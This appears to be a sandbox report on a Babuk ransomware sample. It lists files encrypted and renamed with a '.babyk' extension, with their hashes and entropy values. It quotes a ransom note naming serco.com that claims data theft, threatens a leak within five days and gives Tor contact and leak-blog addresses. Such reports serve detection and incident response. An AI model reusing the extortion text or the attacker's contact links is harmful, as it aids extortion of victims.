                                                                            SSDEEP:24:cjf6OOTONSj4NGSMFzsr1d0Pz6Wvl13TLLHktQ6PM7hl0lUOAYGJJAASxCq:cjjOTV0MKr4NtRHHmQ6PMj0KOABgd
                                                                            MD5:DEC42CF278E15CBCEBA554144EB116E5
                                                                            SHA1:5582394DBE5BBF6B9DAA61BEBAF9949B47BA11D1
                                                                            SHA-256:C8D2EF3A3D7BD28B93C8D5A392140F4292EC6B3FFE6B98B17662B67B521C83A2
                                                                            SHA-512:D07FF9E3C9572B5EEC59E3C889D1A61943A47EE5CAACD6D07BEAE969A2862F025DE3C79C63847F195B1500926205391DC4A141D7138D6C7A396C77C2848ABB81
                                                                            Malicious:false
                                                                            C:\Users\user\Documents\VAMYDFPUND.png.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.845666152052158
                                                                            Encrypted:false
                                                                            SSDEEP:24:z4t8MkagLDLhq3+ZDaJWKE2Snj5pU+Bw4uCIq8iy4JF1rv0wMOdo:sthWpq3ADaJZE2m1pU+BZIS71rvRo
                                                                            MD5:E053063B3B2E3494EB74AAAD818611CD
                                                                            SHA1:5CBF46187F01C248B2EBFE7E16150F9122B5966A
                                                                            SHA-256:89A6B65B7E905382E5040CADA2C2A63C5E2466E1158945A7DA676EF5E8B7D80B
                                                                            SHA-512:7F5B86018D896518193E616474CDACAC8D974179AE66875EF4F3DCDD6278E22CF52475C83B9992A1E2BFE928F632BC4E51DD45236B4323BDCA0D8437DF2629CB
                                                                            Malicious:false
                                                                            C:\Users\user\Documents\ZBEDCJPBEY.pdf.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.828877098489281
                                                                            Encrypted:false
                                                                            SSDEEP:24:UL5VZnKDZowFIMrydXV6gVE8T6nNyYBDRqmX6BSE8u0GT+2dSc:UjZnKDTIMmp9/ctqmXwS2P60Sc
                                                                            MD5:0F0D245B56742BA666D6210F2A8ADD36
                                                                            SHA1:408234C29A910F3DD5B5EDE3B36ED7A2FCD031E3
                                                                            SHA-256:C44C6A45A853A66FCB76397A05E8DA199EAB98558033476D5B54E20F17C4148B
                                                                            SHA-512:72E6B461C6D08ECE973765A9D32F4BADB2B8F1AAE87787A622347FEBE76D3DF2CEC59D273597453D3692DDF080F85AC8A1D6328F4979D3F2CD9BEE4498D0AF5E
                                                                            Malicious:false
                                                                            C:\Users\user\Documents\ZBEDCJPBEY\BPMLNOBVSB.xlsx.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.850517234298039
                                                                            Encrypted:false
                                                                            SSDEEP:24:W4a8N9ZxWKpBQJg05zJUVcpLNgpIIn9oSkNQKX+aY1FHxkkeyCN:W0NtmZ5RN/+9raY32N
                                                                            MD5:F3BEB4465CF1780F4F6C8171C0B651F7
                                                                            SHA1:D3B0BE2E0AB31D79468200A6F67AB50580176413
                                                                            SHA-256:CD2D548268784BA7CEDBB779273D53B4ED4325FF5B1E49C51A72D9DD6372C4C2
                                                                            SHA-512:4A02A1B51F8BF1258EF4E0BB8A43EB443236B4DA96292F3651380CA1B6E42FD4F290D06D3F3166AEA12CB5ECDB0AF76FD796355C1F191F0558F4E60A9F99D1C9
                                                                            Malicious:false
                                                                            C:\Users\user\Documents\ZBEDCJPBEY\FENIVHOIKN.pdf.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.814645400867575
                                                                            Encrypted:false
                                                                            SSDEEP:24:Jbf2QmF5lkhVWIlyqZfdHFbkTk/5slVXeNph9HTsT0MrV71CjprcnZCTUbTpSZ:JfVw5uWoyelbN8kdHy71Ciqwps
                                                                            MD5:303171875BD2FADC435242EED9025B09
                                                                            SHA1:EB3E164B1DF7433AC64AAC4B926845ECA070B65B
                                                                            SHA-256:01AEC6E77C287992AB9EF6AB606409652C44D01D622A01F5CF95E9EE40BD7161
                                                                            SHA-512:5AAD16C28E2086EA992BC1493FC154AE324224009EC02DDD124F168520E5AE08E323A6DC6E1DF03EC56D2302D9DB3B34831CFD89DDE2E196DF9CDE93B42439E7
                                                                            Malicious:false
                                                                            C:\Users\user\Documents\ZBEDCJPBEY\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\Documents\ZBEDCJPBEY\UOOJJOZIRH.mp3.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.807957217149887
                                                                            Encrypted:false
                                                                            SSDEEP:24:lV4UtIDG8qcunqDDBeEnLH5HIRgfs+fZ0MjQK2GCVlyVHyODv7zSjnzkcEXb:EUyXqcQ+lHIssK0MT2JHu3fSjQc0b
                                                                            MD5:7FF7144D9BEC3D1DCF30B9B737811763
                                                                            SHA1:49DA3992F9C02EB8F936AAC55C6B07FC8250BFA8
                                                                            SHA-256:4D27C69DC5AC21FE9FDF0CFD89ED9EAA424943B7145A672389DCAC89F8A52F19
                                                                            SHA-512:143C1D6698E8D70ADEF7860F954A3A9AB56C5FDE306026F67229505DFDFAC87C6D0CF0BB4A7F7E719674987D63489B1E1320EAFDCA8F40786AA265493B87FFDD
                                                                            Malicious:false
                                                                            C:\Users\user\Documents\ZBEDCJPBEY\VAMYDFPUND.png.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.821670545474546
                                                                            Encrypted:false
                                                                            SSDEEP:24:AQT7VPnwhZugD3ZZrj2ICwPwe9Z6yFFpsZmVz30KH2ic:AM9n4zLrj2ILPwuZPFFpuAoL
                                                                            MD5:94B3974BBE9C9158D44F3E5B4D7D7FBD
                                                                            SHA1:8959D7AABD0F922C25369CF90078D94E7B33F819
                                                                            SHA-256:64ACA7C5B89BC774AD630CAEAF8AE150CC85C854E2464170134B7559783A18C0
                                                                            SHA-512:A8EEF9EF4C302BA9064959E7489FDA17D8DC84B2F885F5943158B447C32CF79EF8BAC1A3D2C6093A2A29CDCF038054746654A086AB283222E6D5FA732E035EE1
                                                                            Malicious:false
                                                                            C:\Users\user\Documents\ZBEDCJPBEY\WKXEWIOTXI.jpg.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.8292002793350095
                                                                            Encrypted:false
                                                                            SSDEEP:24:QTI8h2fTbRxhFK2ofSaF5qUlbCkfG7EQF3XXFrcAS33wYhM4zCiOuekKkD:Qj8brqSo5lbCmMs/CG7
                                                                            MD5:BBB04907B948478EAAEFAD6FD5C66164
                                                                            SHA1:EBC1C087AE0F977E67F72BDF10B7708753A79F95
                                                                            SHA-256:3B21DBE49D4FEFAC79B1ED1E1F1FB8766D4659A92359176A6E2DA70846097D7E
                                                                            SHA-512:9BFAADC87586587747F6DF7A9D4F3D73689F6F0BC8C1F4538BE30CF88800D9EE37297DEB89E5DED02E3BDFAE1600CDD9EC64D73975B021BF32D3F42B885A3E86
                                                                            Malicious:false
                                                                            C:\Users\user\Documents\ZBEDCJPBEY\ZBEDCJPBEY.docx.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.836858496756232
                                                                            Encrypted:false
                                                                            SSDEEP:24:2yrbv/O5iyo/gzd9u4LJJeJ7hfsK6WJ/DJRyvnlM0to3h1mkK66gZ:fbO5fo4ju4LJJk7hh5FDnclsUO
                                                                            MD5:E48D0C66935E90D780C77AC75B574D9D
                                                                            SHA1:CB5E566F20975FCE2D323726A7C6D139114E8FE2
                                                                            SHA-256:99A4032B3E4744CD2342DF2AEB7C0FFE2A1081D845197256E13341DC7A9D4F8A
                                                                            SHA-512:3D4A142F4BA45893C81F0E0D6952A2AC5F8E8B895593833D88D66F935105BFC02C639D38747D276293F5406A0679FCC80DB35236956F20FB10A873C781880882
                                                                            Malicious:false
                                                                            C:\Users\user\Documents\ZQIXMVQGAH.mp3.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.862174794704382
                                                                            Encrypted:false
                                                                            SSDEEP:24:hr2sxHO28Ty/u+FgU6y8CsWoentVXlX6mpoAgnBVc2HbtQxRo9QHTURKWJhsXxqW:hDHO28m1FgawytfX6mpgBVbxSqxR5kIW
                                                                            MD5:3893F9DF2FE170ACAE30F5AC382BC4C6
                                                                            SHA1:A19121774C7EB94010CF7780F0F7B6C25B4482E3
                                                                            SHA-256:44BE7B41DB0B8128407425EB6703D28D93E95B0261D688BF08C0F7498BDD287B
                                                                            SHA-512:E8B59D0D942095E7D2A06598AD282AE3E5CA4DED4486FF37BF8B3B8365C738A44D1132DCF806DB818CC9B3B3996450117FB6C9587E6D3C4AEE562A65978DA9B4
                                                                            Malicious:false
                                                                            C:\Users\user\Documents\ZTGJILHXQB.pdf.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.828917124960974
                                                                            Encrypted:false
                                                                            SSDEEP:24:SW66haqZ5+sfJ8MBR01NcItv8Oq8jjHjpJwOo07Uoz9bQHv4+RuGD:SW66DZ5+kRWk+jzwOtpX67
                                                                            MD5:B361C40F7B0E7F13B95F36BBD11F8AC2
                                                                            SHA1:7A7978854F015935FD31ED274E3DA015DA5E0FC8
                                                                            SHA-256:87C1901EA9A22713B18738FFB9BFAADAB9AA781D312E7422273BFD09E2A4B84E
                                                                            SHA-512:255460C6B63C3BE7160DE98D4CBCA6B9D57C5CE19335CB8A0CCE6E3DE7589634C6A09B8EB02B0CA405A23AB053D57F6A51DC1ABE839720D68463D5D2021AB622
                                                                            Malicious:false
                                                                            C:\Users\user\Downloads\BPMLNOBVSB.png.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.8511483934527275
                                                                            Encrypted:false
                                                                            SSDEEP:24:sf9X845Wi1/isWlbi2ncJwJ2HNr8KkeZgzK4xHFLZF9yDFP:+5r16rg2nTJ2tr6tZ3k1
                                                                            MD5:76A350FE015A1118CF8481DC6A3D6AD4
                                                                            SHA1:55968B4789993608BA353B34828A47A5DB06BA2C
                                                                            SHA-256:A8B5A7F47D766E4124D444BB4D495ACEE6B7816623D12887F17E1386278F812D
                                                                            SHA-512:142EE2BFDE84250C1A0C4E9C19B7FAF2215DAF4AD6E4A5E709D9FC003863B5905D5951CE2E2CE96E6ED7576C7B6153EBDFFC89AD2D0B0BBDC4F8685FADF1D4F5
                                                                            Malicious:false
                                                                            C:\Users\user\Downloads\BPMLNOBVSB.xlsx.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.845921202341683
                                                                            Encrypted:false
                                                                            SSDEEP:24:KFk+E3MPHhX3xmL/u2ylT6SMByczgF228JdA3O4ZayeHGR984WaIoFtWZI4MiYs:KF08vmiFlCBycFzk3FreHGEBaIovaIds
                                                                            MD5:15A7E0B26EDD48822C3689452C34C093
                                                                            SHA1:78F4119BC0CEC50665D213F3C9BBF29EC5A172E8
                                                                            SHA-256:D5657CD5692FE3E6828502D87CF50462C82DF73246E3CD1F3826B1F6693697BD
                                                                            SHA-512:C6A621F73FF9780967C851DBFB794609645207F80043298DB4758138ACA893FE1B9D742A08F51AD18F206F16CDECBDD60BD706F1EE41AAA510FA1C98392209B2
                                                                            Malicious:false
                                                                            C:\Users\user\Downloads\FENIVHOIKN.pdf.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.809139453045874
                                                                            Encrypted:false
                                                                            SSDEEP:24:fAKS1VU/YQotFQCNey6gfJmWdnJ43yPOXLBpAYiHdoMtYGcikC:fAKKVUQQMpxRmsJ43yPO1pAYk+Gf
                                                                            MD5:E804E717064D5AF015AC11D69F398CDA
                                                                            SHA1:AC9EF7C96999B9D1359E3A406CD960A5100EE662
                                                                            SHA-256:F87AB180F19AA85FC5DF9019AD61D030E553A4CEB71F09C4B12D8F64C310A9A1
                                                                            SHA-512:FF3EC6BBCB919375F041A07E1004CA192DB202926A02650A083ED4FC7B7F38C7D83DADE4890DD096C899A7F567A40CF514540D80100EBA47702E07AD60B605C3
                                                                            Malicious:false
                                                                            C:\Users\user\Downloads\FENIVHOIKN.xlsx.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.838375095976821
                                                                            Encrypted:false
                                                                            SSDEEP:24:5bZDsIpQT6gDSyeIF+EUiEoUXbmkAap0DWiAu/TLigtl2dR:5bZIOsDSxIelCkg5AOzl2D
                                                                            MD5:54249162E893C01AA7D06A6AA99330AB
                                                                            SHA1:A5F2227E56F053D9584A2C97D39BD1D745A8BBEB
                                                                            SHA-256:57BD1BD9190D7D54DEDFA4CB99364E413620040702A979CAFC568C7CCCCA1CE4
                                                                            SHA-512:53E29D38D4819AAF7FD9F7DB583A3EFEF7B687404330C3E91B75C3A3B5EAF8F71118300D4485E552E3CF7DF8734E8B3B4104B0FB84E19020374BB3666CA0F083
                                                                            Malicious:false
                                                                            C:\Users\user\Downloads\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\Downloads\IPKGELNTQY.png.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.83262760604983
                                                                            Encrypted:false
                                                                            SSDEEP:24:9XloC2OxE26ZmSW6o6vSW0TWqH5OG2/Rdsb09zoefhYdF:NKC2eEe8vSW0dH5uO68efhAF
                                                                            MD5:0CFDAC0737587444C3535ACAEFDF98F4
                                                                            SHA1:FC867757270C4EC10638C35B429DAF4FB3337790
                                                                            SHA-256:C0C7F6C96E818A2A0C796CF200A8F509DC1FAF282DFDDC459AC30507BE6303F6
                                                                            SHA-512:CDAF89754710E7F9A384AF88120A858C20AE9AA537A9C81C5B1942FE700E1130C6F9B4DC59D06200860BB73128EBA085969197346C50F91C515680EADE7FF2E0
                                                                            Malicious:false
                                                                            C:\Users\user\Downloads\JSDNGYCOWY.xlsx.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.802025673502048
                                                                            Encrypted:false
                                                                            SSDEEP:24:EXzRSnEPlm7gl4pBDUIBwD6mDAUFsTHfHMqOV7aab6Xmb1zMXzq:EXzRDlm7gl4p1UWwD6mDrsTHkqORb68N
                                                                            MD5:20C92FABFBA35C69CAFE02405D587385
                                                                            SHA1:8FECB8CCA58DBD2114B34D31812B005EE53E95C2
                                                                            SHA-256:629FCE5DC74E585BF32E05AFC9B40A776660E92F2317576E4DCDAAB51412BC03
                                                                            SHA-512:6726509D861B53B84EB03E996632A9CC425DB473AF43A550403E670FAFF01D8F2DB0162DDDED2843D94F5A0E9059051FE6CF91733DA4C7626EDEE832720CCFE5
                                                                            Malicious:false
                                                                            C:\Users\user\Downloads\KZWFNRXYKI.docx.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.853113374933634
                                                                            Encrypted:false
                                                                            SSDEEP:24:XeW/M08W+EIjh5N3k6DlKARWuFV7J0Dvpsd10uRJC:T/MC+EIjLxDlRWmoDCdauy
                                                                            MD5:268A75DBD6CD927430178E55E1DDED70
                                                                            SHA1:BE4A060C3A1E4F9E9199C397613D3467249D5824
                                                                            SHA-256:476C1E703F8D7BBAD02946404C1FE4356F0B12C8A0F6C49B6280D7907920F510
                                                                            SHA-512:BE7ABEC89A6F95689774E786A2659076C801F7FA6CA87714C8F65BC98BC1BA6DFB9BFAC5869D9AD0B9F63F77A278D77908EBFADA2888C92956D6DEE1DF61A5BC
                                                                            Malicious:false
                                                                            C:\Users\user\Downloads\NIKHQAIQAU.docx.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.820685121702888
                                                                            Encrypted:false
                                                                            SSDEEP:24:/qN92AB2o7Lrw4xTD7g52InKPlLJSR1ccNQS8yF2hi4FiVkQn+:/a2AB33rw4xTHg52In193Fyi4Fi6Qn+
                                                                            MD5:97A5026AAB32E5B4C18270A90A97A2F6
                                                                            SHA1:A0A46AE213603DFFF9BA464D6879AE59E8CDB5B4
                                                                            SHA-256:22248BF4A369CA8E56FA217B349A8AFE2B0BEDB46C09E01DAB7C7394D21C2601
                                                                            SHA-512:5AB36F67C4B855FDBEF13204432AEAD716FE35DAF91F733216E310F69723BE8F49089762FC874CF2202E28CCD17A34B41D0E20E2CDFF5401EFBAFF16368709AF
                                                                            Malicious:false
                                                                            C:\Users\user\Downloads\NIKHQAIQAU.jpg.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.815883683908296
                                                                            Encrypted:false
                                                                            SSDEEP:24:pow/0RIDheeb8u/p1pN1Y6mtUbpUELXiKVl0Yt/rx4Mvf72bdjuPg307JVL30vq1:pjDhN1p1pJpUEjiclthpfQwgEFdEvqya
                                                                            MD5:BDBEE584CDF9B8CA6357C8F919EEE97F
                                                                            SHA1:3711C85DAAE123F292FA2D2BE204ECE2989F21B7
                                                                            SHA-256:6CD6BFE26E182B35A83C321FC743587BE52E0C00B5EB8340F2AED0022FC29B2F
                                                                            SHA-512:030F113C6FF067F8C23F373E6107150BC6D81B658D0E146E644D9E4919B3A57673D763BD644B5F637914DCEDEEB11AB400959B4B66724CE715257642487838D8
                                                                            Malicious:false
                                                                            C:\Users\user\Downloads\RAYHIWGKDI.mp3.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.840476410131226
                                                                            Encrypted:false
                                                                            SSDEEP:24:r4BQcXUWwGGcdRyNz1Wpgt18hU2afdSDZM1i0GWModlo+b:sBQqQEdRNpgv8hUrdC2zG8dV
                                                                            MD5:E606EA630914024E44B07ED7C353FF3E
                                                                            SHA1:40D65102744C508D5654E83465753F54DD47D06C
                                                                            SHA-256:1ED369A1A67E2C4BAE1D1F6C700C15C33650F0A60ECF7ABFCC899FDD103967D9
                                                                            SHA-512:941473879F47EC6F55A8751E5A687E1E961A2D6DC3A3172C6393C11824FA4B986D0CCE82BF69A40755F4392A4687A4B2C4FF3A44DDA81F18FE485B768DDC972E
                                                                            Malicious:false
                                                                            C:\Users\user\Downloads\UOOJJOZIRH.jpg.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.817679445542346
                                                                            Encrypted:false
                                                                            SSDEEP:24:WuIcwKoDxp692XCu6xcCj16ZzjXAKewOytOUtmBsliY8V1tVCgbqRN:W6wc92uuCx6ZzjXTOyVtOsliY8pQgbq7
                                                                            MD5:6AFD0B1B4DB4EACF6FFB930E3A69091F
                                                                            SHA1:1360B28624AE4452FFCFB7E1F2BFB1D9D6BF7013
                                                                            SHA-256:E05287858E84DCAB8642BCEBF6039B2032C3096DCBFDB5C2040153B7D4129E19
                                                                            SHA-512:B1701B10BB7B0705D736364EBE9C7F66971225D2D20F494911458BFE6AE326D0A9AD5F9614EAAB4347EEA893B187D42755358D7E2F08A95331966EE7C67E4B1D
                                                                            Malicious:false
                                                                            C:\Users\user\Downloads\UOOJJOZIRH.mp3.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.837521466830756
                                                                            Encrypted:false
                                                                            SSDEEP:24:5UuaZpR7OzWQ1hePQlimAAYLIAkyvGUugO/43/Wxdju2:5Uxphg/RM59kwGUugOk+f
                                                                            MD5:72424CEEBBA0028E074A807EB8315724
                                                                            SHA1:8A3B91C82470F3A53D008765CF87C0B5F1C25DF7
                                                                            SHA-256:7C7A0A4002FE8269DF53CF22354D85CA14CA26B64D15D24E0467A496D15DC3E1
                                                                            SHA-512:AD5DE2E28A2B39F8194B9D8D42B1E7D7A3CAAEE81E6E24C2DB68EA182A3C9BDE2156CDD617534DEC389C844362E8158DB5E2742D12A295DA203D30555D390D01
                                                                            Malicious:false
                                                                            C:\Users\user\Downloads\VAMYDFPUND.png.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.805040346219205
                                                                            Encrypted:false
                                                                            SSDEEP:24:jTpCMPg54LR9P+3wismdavrvwBOxn/0lwOegf91f13jeGiMwXR5E7mT:jT4ViviRE/0lwOegdSBbT
                                                                            MD5:0675651C2735F33D6EC0EAB8A60BBDB1
                                                                            SHA1:33838C185AAC41FA247B6FEBF8D137B07C3FA52C
                                                                            SHA-256:22C36B8CBEBC2B435F4561C51D96806AC742A92FF3B9303B9C2A53608A59C13B
                                                                            SHA-512:972FC544112090F7EE5DEB40B866E43DDD14EAD132D1FB310E71C09BB272ADC71D7AF04B099DD7E873FEBB5525465B688F945931DA5CE4FFA9258416B103EC85
                                                                            Malicious:false
                                                                            C:\Users\user\Downloads\WKXEWIOTXI.jpg.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.809596568818312
                                                                            Encrypted:false
                                                                            SSDEEP:24:sP/CPsIivBF4Wg080wsztp5IcWRNYlABQenoOyTx7veUV:sHCHoBWwlz1m+yBZ9KNX
                                                                            MD5:62AD1A69009B72C393FF7988DABD526E
                                                                            SHA1:08870C2C3BB37BAB4A1C112F06C2E6723C6E05E0
                                                                            SHA-256:6431A9D3BECE074492EBF7A62C0DAA189AACDC7D36E02ADD27ECD20D62994945
                                                                            SHA-512:67A5EBCAADFEA11CCC4A5D5524D410A107D1B7C28FC62D4EA493334246A9896B917A23AF1C89B2DEA5C0013222BD87E3EB1186185C8E1C33C8F4E406A0779B8D
                                                                            Malicious:false
                                                                            C:\Users\user\Downloads\ZBEDCJPBEY.docx.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.7959273420579365
                                                                            Encrypted:false
                                                                            SSDEEP:24:Ws5wVk39SC7QhTVSVaC8zvwbBZZvo6dcqgoN/3lY7pMhpUQoBFI0:Ws5WkNSQQ9VSIC8MbJoycqg7yroDI0
                                                                            MD5:885C7650CC588EFCB7CE715D684B3F23
                                                                            SHA1:4E00B0B2EB1264DA76564C30670E7165AFF0E9B6
                                                                            SHA-256:5206E842B9365336ABEE2EDAF5E13E5345D2D0233697BD6FE127E56804A4052A
                                                                            SHA-512:01424BCB42B34397E20902AE9AA4F0AF066B9A159ACDA9EC05A880342856AD1F8359434F98E96E19CFC81492F19543DF485C3737A8025F82D863D64FE6FE361F
                                                                            Malicious:false
                                                                            C:\Users\user\Downloads\ZBEDCJPBEY.pdf.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.8118167373755085
                                                                            Encrypted:false
                                                                            SSDEEP:24:NZw0IstMbf7EkPeWlWrI8mslNl47eTbUiVwo3Ro4rXdwQJ:NO0rMbf75diN2e/koK4rX+e
                                                                            MD5:ED0FE717504BDBFF5676197E148A9E10
                                                                            SHA1:823D89DA4331ACCDA99F0214E750C5158D2371C0
                                                                            SHA-256:51E99533585F513250E0BB2A3847EA0E860F3AD492306D01F46BC54A18753884
                                                                            SHA-512:054EF80A37B93F04EC1FB7F2DA2777CFC4365C2D673E97EEAA3EF0A3EBA7133E30DD4CDFBAF6F0C77A4416B6CF8E93E67B449DF3DCA0729C7190E76A71D32F76
                                                                            Malicious:false
                                                                            C:\Users\user\Downloads\ZQIXMVQGAH.mp3.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.813882786386346
                                                                            Encrypted:false
                                                                            SSDEEP:24:OrFXa+c+m2g6eEoX/Vi5Y/NOC+NMNTaDq5q4fDQUTW6WcJY:OrFqN+mCodi5MsCYMNTaDq54j5J
                                                                            MD5:9CCE1DC01AFB547883F0B107BD57B3A2
                                                                            SHA1:8F30F7CB05F1A38FA50B42C634E9527DC33B7CE5
                                                                            SHA-256:BD5EE45025D328951E07AE4A2AEE31FA5B6830907BDF99BE8676B2FAF1C9FECA
                                                                            SHA-512:CE782D0E464AF4B22BBAF16EBE6DC5B3C99B10B96B6AFA234C7FF9B03EC142704746D2E7C00071C9BE446AB528CEFC2F5964EBF273AB997CECAD1C50B29A8BA7
                                                                            Malicious:false
                                                                            C:\Users\user\Downloads\ZTGJILHXQB.pdf.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.83114926173514
